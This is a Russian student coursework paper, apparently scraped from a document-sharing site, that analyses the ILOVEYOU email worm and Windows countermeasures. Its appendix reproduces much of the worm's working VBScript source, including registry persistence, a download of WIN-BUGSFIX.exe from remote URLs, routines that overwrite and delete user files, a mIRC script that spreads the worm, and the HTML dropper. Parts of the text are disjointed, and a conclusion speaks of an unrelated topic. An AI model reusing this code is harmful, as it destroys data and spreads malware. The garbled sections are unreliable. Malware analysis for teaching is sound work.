Анализ способов противодействия вирусу ILOVEYOU в операционной системе Windows, Рефераты из Информатика

Скачай Анализ способов противодействия вирусу ILOVEYOU в операционной системе Windows и еще Рефераты в формате PDF Информатика только на Docsity! МИНИСТЕРСТВО НАУКИ И ВЫСШЕГО ОБРАЗОВАНИЯ РФ ФГАОУ ВО «СЕВЕРО-КАВКАЗСКИЙ ФЕДЕРАЛЬНЫЙ УНИВЕРСИТЕТ» ИНСТИТУТ ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И ТЕЛЕКОММУНИКАЦИЙ Кафедра прикладной математики и компьютерной безопасности КУРСОВАЯ РАБОТА по дисциплине «Защита программ и данных» на тему: «Анализ способов противодействия вирусу ILOVEYOU в операционной системе Windows» Выполнил: Бурьянов Андрей Игоревич студент 5 курса группы КМБ-с-о-16-1 специальности «Компьютерная безопасность» очной формы обучения ________________________ (подпись) Руководитель работы: Гусева Людмила Леонидовна канд. техн. наук, доцент, доцент кафедры прикладной математики компьютерной безопасности СКФУ Работа допущена к защите _______________________ ______________ (подпись руководителя) (дата) Работа выполнена и защищена с оценкой _________________________ Дата защиты______________ Члены комиссии: ________________ __________ _______________ (должность) (подпись) (И.О. Фамилия) ________________ _______________ _______________ ________________ _______________ _______________ ________________ _______________ _______________ Ставрополь, 2020 г. УТВЕРЖДАЮ Заведующая кафедрой прикладной математики и компьютерной безопасности, д-р физ.-мат. наук, доцент ________________ Ф.Б. Тебуева «25» ноября 2020 г. Институт информационных технологий и телекоммуникаций Кафедра прикладной математики и компьютерной безопасности Направление подготовки Компьютерная безопасность Направленность (профиль) Разработка защищенного программного обеспечения ЗАДАНИЕ на курсовую работу студент Бурьянов Андрей Игоревич (фамилия, имя, отчество) по дисциплине Защита программ и данных 1. Тема работы Анализ способов противодействия вирусу ILOVEYOU в операционной системе Windows 2. Цель Исследование существующих способов противодействия сетевым вирусам 3. Задачи – проанализировать принцип работы вируса ILOVEYOU – исследовать способы реализаций методов противодействия вирусу ILOVEYOU 4. Перечень подлежащих разработке вопросов: а) по теоретической части Введение 1. Анализ вируса ILOVEYOU. 2. Исследовать способы реализации методов противодействия вирусу ILOVEYOU. Список используемых источников б) по аналитической части 5. Исходные данные: а) по литературным источникам Содержание Введение В настоящее время наблюдается безудержный рост числа пользователей глобальной сети Internet. Все большее количество людей получает возможность оперативно получать необходимую информацию, обмениваться письмами, общаться по интересам и т.д. используя ресурсы Internet, который стал поистине глобальной компьютерной сетью. Пользователь домашнего компьютера, не являющийся специалистом и в основном использующий компьютер для игр и для подключения к сети Internet является более уязвим для сетевых атак. И количество таких пользователей увеличивается в геометрической прогрессии. Уровень подготовки пользователей все более снижается, все далее уходит от профессионализма. Этому в немалой степени способствуют фирмы-изготовители программного обеспечения. В своих программных продуктах они максимально облегчают интерфейс, предельно уменьшают участие пользователя в работе программы, автоматизируя сам процесс работы. Использование языков высокого уровня, предельное упрощение и автоматизация процесса создания программ позволяет пользователям создавать программные продукты весьма неплохого качества даже при отсутствии глубоких знаний программирования и устройства компьютера. Сложное разветвление скриптов и использование системного реестра операционной системой MS Windows 98 может послужить наглядным примером. Создатели данной операционной системы и великого множества приложений к ней постарались предельно «облегчить жизнь» простого пользователя и предельно автоматизировали их работу. Однако при этом они максимально облегчили жизнь и еще одному виду пользователя – компьютерному вирмейкеру, создающему определенный тип программ – компьютерные вирусы. В течении последних года – двух вирмейкеры резко поменяли цель своих «усилий» - вместо атак на операционные системы, память и системные области жесткого диска стали использоваться для проникновения в компьютер те же «внешние ручки управления» входящие в состав MS Office, MS Outlook, mIRC32 и другие приложения MS Windows. Статистика описаний новых вирусов, подключаемых к антивирусным базам программы AVP Е. Касперского, с сайта www.viruslist.com, говорит о том, что 80% из поступивших вирусов составили Internet-черви и Internet-троянцы, 15% - вирусы для MS Word и 5% - вирусы для почтовых программ IRC. За этот период практически не было обнаружено в «диком» виде ни одного вируса, проникающего в систему при помощи нестандартных функций операционных систем или при помощи работы напрямую с контроллерами внешних устройств. Не используется и система прерываний BIOS и операционной системы как для проникновения, так и для осуществления деструктивных действий. В основном для всего этого используются встроенные функции языка Visual Basic, Java, скриптов MS Word, Excel, Access. В данной курсовой работе для достижения поставленной цели получено следующее задание: 1) Проанализировать алгоритм работы вируса ILOVEYOU. 2) Исследовать способы реализаций методов противодействию сетевому вирусу ILOVEYOU. при помощи почтового клиента добровольно скачивает и запускает червя целиком. 1.2. Анализ алгоритма интернет-червя i love you Компьютерный вирус I LOVE YOU по своей сути является одним из представителей класса вирусов – Internet – червем, распространяющемся по системе электронной почты и использующий для своего функционирования встроенные функции Visual Basic из состава MS Windows 98 (при наличии установленного приложения Visual Basic и в MS Windows 95). Он интересен тем, что является первым из серии подобных вирусов. В дальнейшем куски его кода и идеи, реализованные в нем, стали широко использоваться в других вирусах и в его клонах. Исходный текст вируса получен мной из ресурсов Internet и является рабочим, поэтому использовать его необходимо со всеми предосторожностями! Интернет – червь I LOVE YOU (в дальнейшем будем для удобства называть его «вирус») проникает в систему при получении по электронной почте письма с темой I LOVE YOU и присоединенным файлом LOVE LETTER FOR YOU.TXT.VBS., в котором содержится код вируса. При прочтении данного письма программой MS Outlook файл с телом вируса получает управление. Здесь стоит несколько отвлечься от хода алгоритма вируса и обратить ваше внимание на использование автором вируса знания психологии человека. Вирус для рассылки собственных копий (это мы увидим далее) использует адресную книгу приложений MS Outlook и mIRC. Как обычно, в адресную книгу заносятся адреса тех, кто человеку близок – друзей, деловых партнеров, знакомых, родственников. Получив от кого-либо из этой категории людей письмо с признанием в любви, пользователь просто не сможет побороть желание открыть его. В этом – то и заключается психологическое воздействие на пользователя со стороны автора вируса – открыв письмо, пользователь запускает вирус на исполнение. Для скрытия того, что файл с телом вируса является исполняемым файлом Visual Basic, автор использовал настройки самой системы MS Windows. Суть заключается в том, что по умолчанию в системе используется показ имени файла без расширения. В результате на экране при просмотре списка файлов вместо файла LOVE- LETTER_FOR_YOU.TXT.VBS, являющегося исполняемым файлом Visual Basic, пользователь видит LOVE-LETTER_FOR_YOU.TXT, что дает ему основание считать его текстовым файлом, не могущим содержать в себе кода вируса. Большая часть пользователей использует настройки системы MS Windows по умолчанию. В теле вируса содержится копирайт автора – студента из Манилы. Рисунок 1. Копирайты автора вируса. После открытия письма для чтения читается файл с телом вируса и запускается главная процедура работы вируса. Рисунок 2. Читается основной файл вируса Вирус анализирует наличие запрета на обработку скриптов в системном реестре и если он есть, то путем изменения соответствующего ключа реестра снимает его. Рисунок 3 Изменение ключа реестра. Далее вирус определяет пути к каталогам WIN, SYSTEM и TEMP. Рисунок 4. Определяются пути к каталогам. В каталог WIN копируется тело вируса под именем Win32.DLL.VBS, а в каталог SYSTEM копируется тело вируса в два файла с именами MSKernel32.vbs и LOVE-LETTER-FOR-YOU.TXT.VBS. Рисунок 5. Определяется имя активного файла. Далее в реестре Windows создается ключ, который будет запускать вирус при каждой загрузке Windows. Анализируется расположение приемного каталога электронной почты и если он не является корневым каталогом диска С: то он переназначается на С: Это делается для того, чтобы в дальнейшем принятый файл WIN-BUGSFIX.EXE был расположен в корневом каталоге С: Рисунок 6. Анализируется расположение каталога Download Directory В каталоге SYSTEM ищется файл WinFAT32.exe и при его наличии генерируется случайное число в пределах 1-4. Если файл найден, то производится прописывание одного из четырех (в зависимости от случайного числа) адресов сайта www.skyinet.net в реестре в качестве стартовой страницы для MS Internet Explorer. Устанавливается соединение и с сервера скачивается файл WIN-BUGSFIX.exe. копии вируса в виде файла LOVE-LETTER-FOR-YOU.HTM. Сам файл содержится в теле вируса. Рисунок 11. Вирус ищет в системе программу mIRC32 Рисунок 12. Рассылка всем участникам чата После попытки (удачной или неудачной) распространения своего тела среди участников чата, вирус предпринимает попытку распространения себя по электронной почте, используя при этом программу Microsoft Outlook Express. Рисунок 13. Отправка сообщений со своей копией по электронной почте Вначале вирус получает доступ к адресной книге приложения Outlook, а затем организует цикл перебора адресов для создания писем со своим телом. Рисунок 14. Доступ к адресной книге программы Outlook Express Рисунок 15. Организуется цикл для рассылки Далее вирус создает тело письма с адресом отправителя, темой и текстом, присоединяет к письму файл с телом вируса и отправляет его адресату. Если в Outlook нет адресной книги или она пустая – письма не создаются. Рисунок 16. Вирус создает тело письма с адресом отправителя Рисунок 17. Присоединяет к письму файл с телом вируса Закончив свои процедуры вирус завершает работу, не оставляя при этом своей резидентной копии в памяти компьютера. 1.2. Выводы по разделу Анализ вируса ILOVEYOU путем изучения его алгоритма работы позволил сделать следующие выводы: 1. Для распространения вирус использует internet 2. Основной целью атаки вируса являются пароли пользователя. 2. Исследовать способы противодействия сетевому вирусу ILOVEYOU 2.1 Основные методы поиска 2.1.1 Сканирование Это самый простой метод поиска вируса. Он основан на последовательном просмотре памяти компьютера, загрузочных секторов и проверяемых файлов в поиске так называемых сигнатур (масок) известных вирусов. Сигнатура вируса - это уникальная последовательность байтов, принадлежащая вирусу и не встречающаяся в других программах. Определение сигнатуры вируса ¾ очень сложная задача. Необходимо тщательно изучить принцип работы вируса и сравнить программы, зараженные данным вирусом, и незараженные. Кроме того, сигнатура не должна содержаться в других программах, иначе возможны ложные срабатывания. Надежность принципа поиска по маске ограниченной длины не очень высока. Вирус легко модифицировать, чем и занимаются многие авторы вирусов. Достаточно изменить строковую константу, текст выдаваемого сообщения или одну из первых команд, чтобы вирус стал совсем новым. Надежность увеличивается при приведении вируса к каноническому виду: то есть обнулении всех байтов, приходящихся на переменные и константы. Хранение сигнатур канонических форм всех известных вирусов (вспомните, что на сегодняшний день их число огромно) требует неоправданно много памяти. Достаточно хранить только контрольную сумму сигнатур вирусов. При подозрении на вирус необходимо привести подозреваемый код к каноническому виду, подсчитать контрольную сумму и сравнить с эталоном. фильтр между приложением, для которого предназначен скрипт (например, Outlook и/или Internet Explorer), и скрипт-машиной, которая непосредственно выполняет скрипт-программу (например, Microsoft Windows Script Host — обработчик VisualBasic-скриптов). Таким образом, в момент передачи скрипта на обработку и выполнение его код перехватывается и проверяется на наличие как известных, так и неизвестных скрипт-вирусов, и червей. На известные вирусы скрипт проверяется при помощи резидентного перехватчика AVP Monitor, а новые неизвестные вирусы блокируются специально разработанным эвристическим анализатором. Подобная двухуровневая антивирусная система защиты, встроенная непосредственно в самое ядро обработчика скрипт-программ, является гарантированным средством против многочисленных интернет-червей. 2.3 Действия при заражении Если ваша система уже заражена вирусом, то единственное, что вы можете предпринять, это удалить источник заражения. 1) Нажмите START|RUN. 2) Впишите в командную строку REGEDIT и нажмите ENTER. Рисунок 18. Открытие редактора реестра 3) В левой части окна нажмите “+” напротив строки: HKEY_LOCAL_MACHINE, Software, Microsoft, Windows, CurrentVersion, Run. Рисунок 19. Каталог с вирусом ILOVEYOU 4) В правой части окна найдите ключ, содержащий записи: \Windows\Windows\Windows\ System\Windows\ ” и “\Windows\WIN-BUGSFIX.exe” и удалите его. Рисунок 20. Запись в реестре 5) Необходимо также найти и удалить ключ с записью “:\Windows\Windows\Windows\ System\Windows\ Win32DLL.vbs”. 6) Выйдите из Реестра. 7) Нажмите START|SHUTDOWN. Выберите режим “Restart in MS-DOS mode” и нажмите OK. 8) После перезапуска компьютера откроется директория C:\Windows\. 9) Добавьте в строку запись “DEL WIN-BUGSFIX.exe”. 10) Нажмите CTRL+ALT+DEL и пусть Windows перезагрузится. 11) Необходимо также найти и удалить файл VBS_LOVELETTER, что обезопасит систему от реинфицирования. 12) Для исправления записей в Рееестре и удаления испорченных вирусом файлов HTML и TXT, воспользуйтесь инструментом swet.exe (http:// www.antivirus.com/swat.exe), разработанным TrendMicro. 13) Есть также и пара-тройка специализированных программ, которые помогут вам ликвидировать последствия разрушительных действий “I Love You”. (http://digest.com.ua/cgi-bin/links/search.cgi?query=i+love+you). 2.4. Выводы по разделу Исследование способов реализаций методов дистанционной идентификации компьютера на основе теоретического материала по методам, способам и алгоритмам защиты позволил сделать следующие выводы: 1. С помощью специального программного обеспечения был продемонстрирован анализ системы. 2. Наиболее подробную информацию можно получить от компьютера, находящегося в одной локальной сети. Заключение В результате выполнения курсовой работы было проведено исследование алгоритма работы вируса ILOVETOU. Был осуществлен сравнительный анализ существующих принципов сетевого анализа и выбор наиболее оптимального метода. В ходе работы были обозначены и решены следующие задачи: 1) Проанализировать алгоритм работы вируса ILOVEYOU. 2) Исследовать способы реализаций методов противодействию сетевому вирусу ILOVEYOU. spreadtoemail() ; Запускается процедура работы с электронной почтой listadriv() ; Запускается процедура деструктивных действий end sub Процедура работы с реестром WINDOWS sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Windows\Software\Windows\Microsoft\Windows\Windows\Windows\CurrentVersion\Windows\Run\Windows\ MSKernel32",dirsystem&"\Windows\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Windows\Software\Windows\Microsoft\Windows\Windows\Windows\CurrentVersion\Windows\ RunServices\Windows\Win32DLL",dirwin&"\Windows\Win32DLL.vbs" Создается ключ в реестре, который будет запускать вирус при загрузке WINDOWS downread="" downread=regget("HKEY_CURRENT_USER\Windows\Software\Windows\Microsoft\Windows\Internet Explorer\Windows\Download Directory") Анализируется расположение каталога if (downread="") then Download Directory и если он не является downread="c:\Windows\" корневым каталогом диска С: , то пере- end if назначается на C:\Windows\ if (fileexist(dirsystem&"\Windows\WinFAT32.exe")=1) then Проверяется наличие в системном каталоге файла WinFAT32.exe Randomize и при его наличии генерируется случайное число в пределах 1 - 4 num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Windows\Software\Windows\Microsoft\Windows\Internet Explorer\Windows\Main\Windows\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345 gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Windows\Software\Windows\Microsoft\Windows\Internet Explorer\Windows\Main\Windows\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hj k4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Windows\Software\Windows\Microsoft\Windows\Internet Explorer\Windows\Main\Windows\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfg ER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Windows\Software\Windows\Microsoft\Windows\Internet Explorer\Windows\Main\Windows\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqw erasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" end if end if В случае наличия в системной директории файла WinFAT32.exe производится прописывание одного из четырех адресов сайта http://www.skyinet.net/ в реестре в качестве стартовой страницы для Microsoft Internet Explorer (в зависимости от сгенерированного случайного числа ). С сервера скачивается файл WIN-BUGSFIX.exe. if (fileexist(downread&"\Windows\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Windows\Software\Windows\Microsoft\Windows\Windows\Windows\CurrentVersion\Windows\Run\Windows\ WIN-BUGSFIX",downread&"\Windows\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Windows\Software\Windows\Microsoft\Windows\Internet Explorer\Windows\Main\Windows\Start Page","about:blank" При наличии файла WIN-BUGSFIX.exe в каталоге Download ( C: \Windows\ ) в реестре прописывается ключ для его запуска при загрузке Windows и стартовой страницей Microsoft Internet Explorer прописывается файл about:blank end if end sub Процедура деструктивных действий Подпрограмма поиска на дисках sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then Производится проверка типа дисков и поиск по всем дискам folderlist(d.path&"\Windows\") end if Next listadriv = s end sub Подпрограмма заражения файлов sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) Проверяются расширения файлов ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) Если расширения файлов .VBS или .VBE, то вирус записывает себя вместо них. ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then Если расширения файлов .JS ; .JSE ; .CSS ; .WSH ; .SCT ; set ap=fso.OpenTextFile(f1.path,2,true) .HTA, то вирус также записывает себя вместо них ap.write vbscopy и меняет расширения на .VBS ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) Вирус удаляет оригинальные файлы. cop.copy(folderspec&"\Windows\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) Если расширения файлов .JPG ; .JPE ,то вирус записывает себя вместо них и меняет расширения на .VBS ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") Вирус удаляет оригинальные файлы. fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") Если расширения файлов .MP2 ; .MP3 ,то вирус создает файлы с такими же именами, но mp3.write vbscopy расширениями .VBS mp3.close set att=fso.GetFile(f1.path) Вирус присваивает оригинальным файлам .MP2 или .MP3 атрибут «Hidden» att.attributes=att.attributes+2 end if if (eq<>folderspec) then Вирус ищет в системе программу mIRC32 ( чат ) if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then и создает при ее наличии файл script.ini set scriptini=fso.CreateTextFile(folderspec&"\Windows\script.ini") Скрипт для программы mIRC32 (script.ini) scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" Эта часть скрипта осуществляет рассылку всем scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\Windows\LOVE-LETTER-FOR-YOU.HTM" участникам чата копии вируса в виде HTM файла scriptini.WriteLine "n3=}" scriptini.close sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@- @Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@- @>"&vbcrlf& _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE- LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR- YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@- @>"&vbcrlf& _ "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>---------- z--------------------z----------<?-?MARQUEE> "&vbcrlf& _ "<?-?BODY><?-?HTML>"&vbcrlf& _ "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^- ^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\Windows\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\Windows\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) lines(n)=replace(lines(n),"\Windows\",chr(37)+chr(45)+chr(37)) if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\Windows\LOVE-LETTER-FOR-YOU.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\Windows\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub